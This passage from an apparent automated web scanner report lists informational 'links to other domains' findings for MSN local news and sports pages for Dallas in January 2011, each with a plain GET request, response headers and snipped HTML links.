<h4 class="h4 cf"><a href="http://www.bing.com/events/search?q=Harlem Globetrotters&amp;p1=[Events+source=&quot;vertical&quot;+qzeventid=&quot;z149225805&quot;]&amp;form=MSNLAP">Harlem Globetrotters</a>
...[SNIP]...
<h4 class="h4 cf"><a href="http://www.bing.com/events/search?q=O Brother, Werewolf Art Thou?&amp;p1=[Events+source=&quot;vertical&quot;+qzeventid=&quot;z158259485&quot;]&amp;form=MSNLAP">O Brother, Werewolf Art Thou?</a>
...[SNIP]...
<h4 class="h4 cf"><a href="http://www.bing.com/events/search?q=Dinosaurs Unearthed&amp;p1=[Events+source=&quot;vertical&quot;+qzeventid=&quot;z148859065&quot;]&amp;form=MSNLAP">Dinosaurs Unearthed</a>
...[SNIP]...
<h4 class="h4 cf"><a href="http://www.bing.com/events/search?q=Private NFL Experience Courtesy of PepsiCo and Kroger&amp;p1=[Events+source=&quot;vertical&quot;+qzeventid=&quot;z161984965&quot;]&amp;form=MSNLAP">Private NFL Experience Courtesy of PepsiCo and Kroger</a>
...[SNIP]...
<li class="last"><a href="http://advertising.microsoft.com/msn">Advertise on MSN</a>
...[SNIP]...
<li class="last"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=VeakLjTh&amp;resize=false">Feedback</a>
...[SNIP]...

22.123. http://local.redacted/news.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.redacted
Path:   /news.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /news.aspx?zip=75207&q=75207 HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:31 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA27
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=d1a44c75edce492494efb08d3d9ec0da; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=0B104FD17770449C9E5513324E88DF6E; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:31 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 45778

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...
<li><a href="http://video.msnbc.com">Video</a>
...[SNIP]...
<li class="coc3"><a href="http://msn.foxsports.com/">Sports</a><ul><li class="first"><a href="http://msn.foxsports.com/golf">Golf</a></li><li><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl">NFL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/tennis">Tennis</a></li><li class="last"><a href="http://msn.foxsports.com/video ">Video Highlights</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_navigation&amp;FORM=MSNNAV">Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?wip=2&amp;v=2&amp;rtp=~&amp;FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a></li><li><a href="http://msn.match.com/msn/index.aspx">Personals</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=MSNLEC">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_navigation&amp;FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="first"><a class="to_inbox" href="http://mail.live.com/">Hotmail</a></li><li class="last"><a class="to_msgr" href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<div><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296344851&amp;rver=5.5.4177.0&amp;wp=LBI&amp;wreply=http:%2F%2Flocal.redacted%2Fnews.aspx%3Fzip%3D75207%26q%3D75207&amp;lc=1033&amp;id=74430" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div class="link"><a href="http://www.bing.com/search?q=January+29&amp;mkt=en-us&amp;FORM=MSNLEC">Saturday, Jan. 29, 2011</a>
...[SNIP]...
<div class="link"><a href="http://www.myhomeredacted/" id="mkhm">Make MSN your home page</a>
...[SNIP]...
<div class="bingmap1" xmlns:cp="urn:schemas-microsoft-com/contentpublishing/content" xmlns:msxsl="urn:schemas-microsoft-com:xslt"><a class="attr" href="http://www.bing.com/maps/?q=Dallas+TX&amp;FORM=MSNLEC"><img src="http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.78517781,-96.81912677&amp;w=124&amp;h=124&amp;o=jpeg&amp;b=r,shading.hill,mkt.en-US&amp;z=8&amp;token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq" title="Dallas" alt="Dallas" height="124" width="124" /></a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&amp;cat=306&amp;FORM=MSNLEC">Beauty salons</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&amp;cat=533&amp;FORM=MSNLEC">Child care services</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&amp;cat=1090&amp;FORM=MSNLEC">Florists</a></li><li><a href="http://www.bing.com/local/default.aspx?q=government+%26+community+near+75207&amp;order=distance&amp;FORM=MSNLEC">Government &amp; community</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&amp;cat=1372&amp;FORM=MSNLEC">Hotels &amp; motels</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/default.aspx?q=shopping+near+75207&amp;order=distance&amp;FORM=MSNLEC">Shopping</a></li><li><a href="http://www.bing.com/local/default.aspx?q=sports+%26+recreation+near+75207&amp;order=distance&amp;FORM=MSNLEC">Sports &amp; recreation</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/local/Default.aspx?where=Dallas-TX&amp;FORM=MSNLEC"><span class="custom">
...[SNIP]...
<li class="first"><a href="http://www.bing.com/weather/tripplan?q=Dallas+Texas+Weather&amp;unit=F&amp;qpvt=weather+Dallas&amp;form=MSNLEC">Trip planner</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/jobseeker/jobs/jobResults.aspx?SiteID=cbmsnLO003&amp;lr=CBMSN&amp;sc_extcmp=JS_MSN_QSBox&amp;s_rawwords=&amp;s_freeloc=75207">Jobs</a></li><li><a href="http://www.bing.com/travel/deals/airline-ticket-deals.do?cid=msnlocal">Travel deals</a>
...[SNIP]...
<li><a href="http://realestate.msn.realtor.com/realestateandhomes-search/75207?gate=msn&amp;source=a2mszh1t042">Real estate listings</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White pages</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/local/ypdefault.aspx?cobrand=1&amp;where=75207">Yellow pages</a>
...[SNIP]...
<img width="16" height="20" alt="twitter" title="twitter" src="http://blstb.redacted/i/95/2845F8ED7FD4376D1898516E22F8.png" /><a href="http://www.bing.com/twitter/search?go=&amp;form=MSNLEC&amp;q=Dallas,TX">Read Local Tweets</a>
...[SNIP]...
<li class="last"><a href="http://advertising.microsoft.com/msn">Advertise on MSN</a>
...[SNIP]...
<li class="last"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=yiVCumGs&amp;resize=false">Feedback</a>
...[SNIP]...

22.124. http://local.redacted/news.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.redacted
Path:   /news.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /news.aspx?zip=75207&q=75207 HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 16:50:19 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA32
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=b233315edaf94b3c8165d45cda852309; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=7E3FFAEC13A6476C8C4F97DF9E4C783D; domain=.redacted; expires=Thu, 18-Aug-2011 16:50:19 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 45775

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...
<li><a href="http://video.msnbc.com">Video</a>
...[SNIP]...
<li class="coc3"><a href="http://msn.foxsports.com/">Sports</a><ul><li class="first"><a href="http://msn.foxsports.com/golf">Golf</a></li><li><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl">NFL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/tennis">Tennis</a></li><li class="last"><a href="http://msn.foxsports.com/video ">Video Highlights</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_navigation&amp;FORM=MSNNAV">Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?wip=2&amp;v=2&amp;rtp=~&amp;FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a></li><li><a href="http://msn.match.com/msn/index.aspx">Personals</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=MSNLEC">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_navigation&amp;FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="first"><a class="to_inbox" href="http://mail.live.com/">Hotmail</a></li><li class="last"><a class="to_msgr" href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<div><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296406219&amp;rver=5.5.4177.0&amp;wp=LBI&amp;wreply=http:%2F%2Flocal.redacted%2Fnews.aspx%3Fzip%3D75207%26q%3D75207&amp;lc=1033&amp;id=74430" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div class="link"><a href="http://www.bing.com/search?q=January+30&amp;mkt=en-us&amp;FORM=MSNLEC">Sunday, Jan. 30, 2011</a>
...[SNIP]...
<div class="link"><a href="http://www.myhomeredacted/" id="mkhm">Make MSN your home page</a>
...[SNIP]...
<div class="bingmap1" xmlns:cp="urn:schemas-microsoft-com/contentpublishing/content" xmlns:msxsl="urn:schemas-microsoft-com:xslt"><a class="attr" href="http://www.bing.com/maps/?q=Dallas+TX&amp;FORM=MSNLEC"><img src="http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.78517781,-96.81912677&amp;w=124&amp;h=124&amp;o=jpeg&amp;b=r,shading.hill,mkt.en-US&amp;z=8&amp;token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq" title="Dallas" alt="Dallas" height="124" width="124" /></a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&amp;cat=306&amp;FORM=MSNLEC">Beauty salons</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&amp;cat=533&amp;FORM=MSNLEC">Child care services</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&amp;cat=1090&amp;FORM=MSNLEC">Florists</a></li><li><a href="http://www.bing.com/local/default.aspx?q=government+%26+community+near+75207&amp;order=distance&amp;FORM=MSNLEC">Government &amp; community</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&amp;cat=1372&amp;FORM=MSNLEC">Hotels &amp; motels</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/default.aspx?q=shopping+near+75207&amp;order=distance&amp;FORM=MSNLEC">Shopping</a></li><li><a href="http://www.bing.com/local/default.aspx?q=sports+%26+recreation+near+75207&amp;order=distance&amp;FORM=MSNLEC">Sports &amp; recreation</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/local/Default.aspx?where=Dallas-TX&amp;FORM=MSNLEC"><span class="custom">
...[SNIP]...
<li class="first"><a href="http://www.bing.com/weather/tripplan?q=Dallas+Texas+Weather&amp;unit=F&amp;qpvt=weather+Dallas&amp;form=MSNLEC">Trip planner</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/jobseeker/jobs/jobResults.aspx?SiteID=cbmsnLO003&amp;lr=CBMSN&amp;sc_extcmp=JS_MSN_QSBox&amp;s_rawwords=&amp;s_freeloc=75207">Jobs</a></li><li><a href="http://www.bing.com/travel/deals/airline-ticket-deals.do?cid=msnlocal">Travel deals</a>
...[SNIP]...
<li><a href="http://realestate.msn.realtor.com/realestateandhomes-search/75207?gate=msn&amp;source=a2mszh1t042">Real estate listings</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White pages</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/local/ypdefault.aspx?cobrand=1&amp;where=75207">Yellow pages</a>
...[SNIP]...
<img width="16" height="20" alt="twitter" title="twitter" src="http://blstb.redacted/i/95/2845F8ED7FD4376D1898516E22F8.png" /><a href="http://www.bing.com/twitter/search?go=&amp;form=MSNLEC&amp;q=Dallas,TX">Read Local Tweets</a>
...[SNIP]...
<li class="last"><a href="http://advertising.microsoft.com/msn">Advertise on MSN</a>
...[SNIP]...
<li class="last"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=yiVCumGs&amp;resize=false">Feedback</a>
...[SNIP]...

22.125. http://local.redacted/sports.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.redacted
Path:   /sports.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /sports.aspx?zip=75207&q=75207 HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 16:50:27 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA31
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=662497c7dbd845c1a593999772e9757b; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=EFC5859DD3FC4353B27260146D565E04; domain=.redacted; expires=Thu, 18-Aug-2011 16:50:26 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 94923

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...
<li><a href="http://video.msnbc.com">Video</a>
...[SNIP]...
<li class="coc3"><a href="http://msn.foxsports.com/">Sports</a><ul><li class="first"><a href="http://msn.foxsports.com/golf">Golf</a></li><li><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl">NFL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/tennis">Tennis</a></li><li class="last"><a href="http://msn.foxsports.com/video ">Video Highlights</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_navigation&amp;FORM=MSNNAV">Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?wip=2&amp;v=2&amp;rtp=~&amp;FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a></li><li><a href="http://msn.match.com/msn/index.aspx">Personals</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=MSNLEC">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_navigation&amp;FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="first"><a class="to_inbox" href="http://mail.live.com/">Hotmail</a></li><li class="last"><a class="to_msgr" href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<div><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296406226&amp;rver=5.5.4177.0&amp;wp=LBI&amp;wreply=http:%2F%2Flocal.redacted%2Fsports.aspx%3Fzip%3D75207%26q%3D75207&amp;lc=1033&amp;id=74430" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div class="link"><a href="http://www.bing.com/search?q=January+30&amp;mkt=en-us&amp;FORM=MSNLEC">Sunday, Jan. 30, 2011</a>
...[SNIP]...
<div class="link"><a href="http://www.myhomeredacted/" id="mkhm">Make MSN your home page</a>
...[SNIP]...
<div class="bingmap1" xmlns:cp="urn:schemas-microsoft-com/contentpublishing/content" xmlns:msxsl="urn:schemas-microsoft-com:xslt"><a class="attr" href="http://www.bing.com/maps/?q=Dallas+TX&amp;FORM=MSNLEC"><img src="http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.78517781,-96.81912677&amp;w=124&amp;h=124&amp;o=jpeg&amp;b=r,shading.hill,mkt.en-US&amp;z=8&amp;token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq" title="Dallas" alt="Dallas" height="124" width="124" /></a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&amp;cat=306&amp;FORM=MSNLEC">Beauty salons</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&amp;cat=533&amp;FORM=MSNLEC">Child care services</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&amp;cat=1090&amp;FORM=MSNLEC">Florists</a></li><li><a href="http://www.bing.com/local/default.aspx?q=government+%26+community+near+75207&amp;order=distance&amp;FORM=MSNLEC">Government &amp; community</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&amp;cat=1372&amp;FORM=MSNLEC">Hotels &amp; motels</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/default.aspx?q=shopping+near+75207&amp;order=distance&amp;FORM=MSNLEC">Shopping</a></li><li><a href="http://www.bing.com/local/default.aspx?q=sports+%26+recreation+near+75207&amp;order=distance&amp;FORM=MSNLEC">Sports &amp; recreation</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/local/Default.aspx?where=Dallas-TX&amp;FORM=MSNLEC"><span class="custom">
...[SNIP]...
<li class="first"><a href="http://www.bing.com/weather/tripplan?q=Dallas+Texas+Weather&amp;unit=F&amp;qpvt=weather+Dallas&amp;form=MSNLEC">Trip planner</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/jobseeker/jobs/jobResults.aspx?SiteID=cbmsnLO003&amp;lr=CBMSN&amp;sc_extcmp=JS_MSN_QSBox&amp;s_rawwords=&amp;s_freeloc=75207">Jobs</a></li><li><a href="http://www.bing.com/travel/deals/airline-ticket-deals.do?cid=msnlocal">Travel deals</a>
...[SNIP]...
<li><a href="http://realestate.msn.realtor.com/realestateandhomes-search/75207?gate=msn&amp;source=a2mszh1t042">Real estate listings</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White pages</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/local/ypdefault.aspx?cobrand=1&amp;where=75207">Yellow pages</a>
...[SNIP]...
<td headers="gsport"><a href="http://msn.foxsports.com/wcbk">College BB Women</a>
...[SNIP]...
<td headers="gsport"><a href="http://msn.foxsports.com/wcbk">College BB Women</a>
...[SNIP]...
<td headers="gsport"><a href="http://msn.foxsports.com/wcbk">College BB Women</a>
...[SNIP]...
<td headers="gsport"><a href="http://msn.foxsports.com/nba">NBA</a>
...[SNIP]...
<td headers="gsport"><a href="http://msn.foxsports.com/nhl">NHL</a>
...[SNIP]...
<td headers="gsport"><a href="http://msn.foxsports.com/nba">NBA</a>
...[SNIP]...
<td headers="gsport"><a href="http://msn.foxsports.com/nba">NBA</a>
...[SNIP]...
<td headers="gsport"><a href="http://msn.foxsports.com/nba">NBA</a>
...[SNIP]...
<td headers="gsport"><a href="http://msn.foxsports.com/wcbk">College BB Women</a>
...[SNIP]...
<td headers="gsport"><a href="http://msn.foxsports.com/nba">NBA</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl/team/dallas-cowboys" title="Dallas Cowboys"><img src="http://msn.foxsports.com/fe/img/NFL/TeamLogo/Large/6.png" alt="Dallas Cowboys logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/nfl/team/dallas-cowboys">Dallas Cowboys</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/nfl/story/Eagles-WR-Jackson-replaced-by-Austin-in-Pro-Bowl-52325786">Eagles WR Jackson replaced by Austin in Pro Bowl</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl/story/Goodell-skips-Pro-Bowl-to-focus-on-new-contract-60632089">Goodell skips Pro Bowl to focus on new contract</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl/story/Howdy-A-Big-D-welcome-to-Packers-Steelers-35730692">Howdy! A Big D welcome to Packers, Steelers</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/nfl/story/Jason-Garrett-Dallas-Cowboys-head-coach-010611">Cowboys remove Garrett's interim tag</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/nfl/standings">Standings</a></li><li><a href="http://msn.foxsports.com/nfl/team/dallas-cowboys/stats">Stats</a></li><li><a href="http://msn.foxsports.com/nfl/team/dallas-cowboys/schedule">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/nfl">NFL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl/team/houston-texans" title="Houston Texans"><img src="http://msn.foxsports.com/fe/img/NFL/TeamLogo/Large/34.png" alt="Houston Texans logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/nfl/team/houston-texans">Houston Texans</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/nfl/story/pro-bowl-players-hoping-game-stays-in-hawaii-012911">Players hoping Pro Bowl stays in Hawaii</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl/story/NFL-NFC-AFC-Pro-Bowl-first-timers-soaking-it-all-in-012811">First-time Pro Bowlers soaking it all in</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl/story/Brees-Zimmer-win-PFWA-Awards-52258753">AP's NFL Awards on NFL Network during SB week</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/nfl/story/AP-source-Texans-hire-Herring-to-coach-LBs-30897071">AP source: Texans hire Herring to coach LBs</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/nfl/standings">Standings</a></li><li><a href="http://msn.foxsports.com/nfl/team/houston-texans/stats">Stats</a></li><li><a href="http://msn.foxsports.com/nfl/team/houston-texans/schedule">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/nfl">NFL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/team?categoryId=86111" title="TCU Horned Frogs"><img src="http://msn.foxsports.com/fe/img/CFB/TeamLogo/Large/85.png" alt="TCU Horned Frogs logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/cfb/team?categoryId=86111">TCU Horned Frogs</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cfb/story/Unbeaten-TCU-stops-Wisconsin-2119-in-Rose-Bowl-96857989">Unbeaten TCU stops Wisconsin 21-19 in Rose Bowl</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/story/TCU-holds-off-Wisconsin-to-win-Rose-Bowl-">TCU wins one for the little guys </a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/story/WisconsinTCU-Preview-82908187">Wisconsin-TCU Preview</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/cfb/story/Rose-Bowl-is-more-than-Badgers-size-Frogs-speed-90645669">Rose Bowl is more than Badgers' size, Frogs' speed</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cfb/standings">Standings</a></li><li><a href="http://msn.foxsports.com/cfb/teamStats?categoryId=86111">Stats</a></li><li><a href="http://msn.foxsports.com/cfb/teamSchedule?categoryId=86111">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/cfb">College FB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/team?categoryId=86138" title="Texas Longhorns"><img src="http://msn.foxsports.com/fe/img/CFB/TeamLogo/Large/83.png" alt="Texas Longhorns logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/cfb/team?categoryId=86138">Texas Longhorns</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cfb/story/Senior-Bowl-Christian-Ponder-South-victory-012911">Ponder leads South to Senior Bowl win</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/story/Ponder-South-win-Senior-Bowl-2410-10241756">Ponder, South win Senior Bowl, 24-10</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/story/AP-AllAmerica-Team-List-25730143">AP All-America Team, List</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/cfb/story/Texas-DE-Acho-wins-scholarathlete-award-52030010">Texas DE Acho wins scholar-athlete award</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cfb/standings">Standings</a></li><li><a href="http://msn.foxsports.com/cfb/teamStats?categoryId=86138">Stats</a></li><li><a href="http://msn.foxsports.com/cfb/teamSchedule?categoryId=86138">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/cfb">College FB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/team?categoryId=86128" title="Texas Tech Red Raiders"><img src="http://msn.foxsports.com/fe/img/CFB/TeamLogo/Large/86.png" alt="Texas Tech Red Raiders logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/cfb/team?categoryId=86128">Texas Tech Red Raiders</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cfb/story/Mike-Leach-lawsuit-thrown-out-against-Texas-Tech-012111">Appeals court rules against Leach</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/story/NCAA-Texas-Tech-broke-recruiting-rules-in-three-sports-010711">NCAA: Texas Tech broke recruiting rules</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/story/Mike-Leach-thought-he-was-perfect-fit-for-Maryland-010411">Leach thought he was Terps match</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/cfb/story/Texas-Tech-45-Northwestern-38-91337506">Texas Tech 45, Northwestern 38</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cfb/standings">Standings</a></li><li><a href="http://msn.foxsports.com/cfb/teamStats?categoryId=86128">Stats</a></li><li><a href="http://msn.foxsports.com/cfb/teamSchedule?categoryId=86128">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/cfb">College FB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/team?categoryId=86112" title="SMU Mustangs"><img src="http://msn.foxsports.com/fe/img/CFB/TeamLogo/Large/82.png" alt="SMU Mustangs logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/cfb/team?categoryId=86112">SMU Mustangs</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cfb/story/Army-holds-on-to-beat-SMU-in-the-Armed-Forces-Bowl-123010">Army caps first winning season since '96</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/story/ArmySMU-Preview-75693926">Army-SMU Preview</a>
...[SNIP]...
